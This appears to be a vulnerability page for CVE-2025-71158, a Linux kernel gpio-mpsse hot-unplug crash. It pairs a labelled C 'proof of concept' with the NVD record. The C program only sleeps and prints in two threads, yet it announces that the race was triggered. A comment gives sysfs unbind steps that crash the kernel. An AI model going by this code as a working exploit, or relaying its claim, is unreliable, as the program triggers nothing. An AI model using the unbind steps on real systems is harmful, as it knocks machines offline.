CVE-2025-71158

/* * CVE-2025-71158 PoC - gpio-mpsse hotplug crash trigger * This PoC demonstrates the race condition in MPSSE driver * Compile: gcc -o mpsse_poc mpsse_poc.c -lpthread */ #include <stdio.h> #include <stdlib.h> #include <pthread.h> #include <unistd.h> #include <fcntl.h> void* irq_worker_trigger(void* arg) { /* Simulate IRQ worker running */ printf("[*] IRQ worker thread started\n"); sleep(2); printf("[*] IRQ worker thread completed\n"); return NULL; } void* device_unplug_trigger(void* arg) { /* Simulate hot-unplug scenario */ sleep(1); printf("[*] Simulating device unplug during IRQ processing...\n"); /* In real scenario: echo 1-1.3 > /sys/bus/usb/drivers/usb/unbind */ return NULL; } int main() { pthread_t worker_thread, unplug_thread; printf("[*] CVE-2025-71158 PoC - gpio-mpsse hotplug crash\n"); printf("[*] This demonstrates the race condition when device is\n"); printf("[*] unplugged while IRQ worker is still running\n\n"); /* Start IRQ worker */ pthread_create(&worker_thread, NULL, irq_worker_trigger, NULL); /* Start unplug trigger concurrently */ pthread_create(&unplug_thread, NULL, device_unplug_trigger, NULL); pthread_join(worker_thread, NULL); pthread_join(unplug_thread, NULL); printf("[*] Race condition triggered - potential crash\n"); return 0; } /* * Real-world trigger steps: * 1. Load gpio-mpsse driver: modprobe gpio-mpsse * 2. Connect FTDI FT232H device * 3. Configure GPIO pins as interrupt inputs * 4. Generate GPIO interrupts * 5. During interrupt handling: echo 1-1.3 > /sys/bus/usb/drivers/usb/unbind * 6. Observe kernel crash or oops */

{"cve": {"id": "CVE-2025-71158", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:52.690", "lastModified": "2026-02-26T20:20:07.863", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ngpio: mpsse: ensure worker is torn down\n\nWhen an IRQ worker is running, unplugging the device would cause a\ncrash. The sealevel hardware this driver was written for was not\nhotpluggable, so I never realized it.\n\nThis change uses a spinlock to protect a list of workers, which\nit tears down on disconnect."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\ngpio: mpsse: asegurar que el worker se desmonte\n\nCuando un worker IRQ está en ejecución, desenchufar el dispositivo causaría un fallo. El hardware sealevel para el que se escribió este controlador no era hotpluggable, así que nunca me di cuenta.\n\nEste cambio utiliza un spinlock para proteger una lista de workers, la cual desmonta al desconectar."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.6", "matchCriteriaId": "879529BC-5B4C-4EBE-BF1D-1A31404A8B2E"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/179ef1127d7a4f09f0e741fa9f30b8a8e7886271", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/472d900c8bcac301ae0e40fdca7db799bd989ff5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}